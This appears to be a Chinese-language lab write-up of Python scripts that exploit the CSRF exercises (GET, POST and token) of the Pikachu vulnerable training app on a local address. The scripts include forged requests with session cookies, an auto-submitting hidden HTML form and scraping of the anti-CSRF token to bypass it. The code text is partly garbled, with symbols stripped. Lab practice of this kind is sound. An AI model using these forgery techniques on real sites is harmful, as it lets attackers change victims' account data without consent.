pikachu自编CSRF(GET),CSRF(POST),CSRF(token)

#与get相似只是修改了一些请求方式#这个漏洞产生的验证就是token实时验证以及前端存在的Cookie验证需要验证两个自编CSRF(GET),import requests from urllib.parse import urlencode target_url http://192.168.8.1/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php check_url http://192.168.8.1/pikachu-master/vul/csrf/csrfget/csrf_get.php #后续检测是否修改 payload { sex:girl, phonenum:123456, add:CSRF执行成功, email:123.COM, submit:submit } query_str urlencode(payload)#因为号前后要保持类型一致需要对字典进行urlencode()编码一下 alert_target target_url ? query_str print(f需要发送给用户的链接为:{alert_target}) #模仿用户被攻击 #用户点击被特意构造的payload headers { Cookie:PHPSESSIDdf0u2o787mgfgc0avf392ksd7g } requests.get(target_url, paramspayload, headersheaders ) resp requests.get(check_url,headersheaders) print([] 注入完成 ) print([] 检查注入是否成功: ,CSRF执行成功 in resp.text)CSRF(POST),#与get相似只是修改了一些请求方式 import requests target_url http://192.168.8.1/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php get_url http://192.168.8.1/pikachu-master/vul/csrf/csrfpost/csrf_post.php payload { sex:girl, phonenum:123456, add:CSRF的POST攻击, email:qq.com, submit:submit } #构造攻击的url,模仿被攻击 Session requests.Session() headers { Cookie:PHPSESSID49mmcmofpdtoh0vn7jvkoj13r2 } requests.post(target_url, datapayload, headersheaders) # resp requests.get(get_url, headersheaders) print([] 攻击完成 ) if 123456 in resp.text: print([] 查看是否注入成功 ) else: print([-] 注入失败 )CSRF(token)#这个漏洞产生的验证就是token实时验证以及前端存在的Cookie验证需要验证两个 get构造 # 拼接成可攻击的URL evil_url target_url ? urlencode(payload) payload target_ul ? urlencode(payload) import requests import re # target_url http://192.168.8.1/pikachu-master/vul/csrf/csrftoken/token_get_edit.php # # payload { # sex:girl, # phonenum:123456, # add:CSRF-token, # email:321qq.com, # submit:submit # } # # html # form actionhttp://192.168.8.1/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php methodPOST # input typehidden namesex valuegirl # input typehidden namephonenum value123456 # input typehidden nameadd valueCSRF-POST # input typehidden nameemail value123qq.com # input typehidden namesubmit valuesubmit # /form # scriptdocument.forms[0].submit()/script # # # with open(CSRF_token.html,w,encoding utf-8) as f: # f.write(html) # # print([] 攻击脚本已写好CSRF_token.html) #假设中招了 target_url http://192.168.8.1/pikachu-master/vul/csrf/csrftoken/token_get_edit.php get_url http://192.168.8.1/pikachu-master/vul/csrf/csrftoken/token_get.php session requests.Session() headers { Cookie: PHPSESSIDif9t2mbpc5c5rf83p1slcn7748 } session.get(get_url, headersheaders) target_get session.get(urltarget_url, headersheaders) token re.search(rnametoken value(.*?),target_get.text).group(1) print(f[] 已获取实时Token:{token}) payload { sex:girl, phonenum:123456, add:CSRF-token, email:321qq.com, token:token, submit:submit } # resp requests.get(get_url,headersheaders) session.post(urltarget_url, datapayload, headersheaders) session.get(target_url, headersheaders) resp session.get(urlget_url, headersheaders) print([] 注入成功) print([] 检查测是否正常注入: , CSRF-token in resp.text)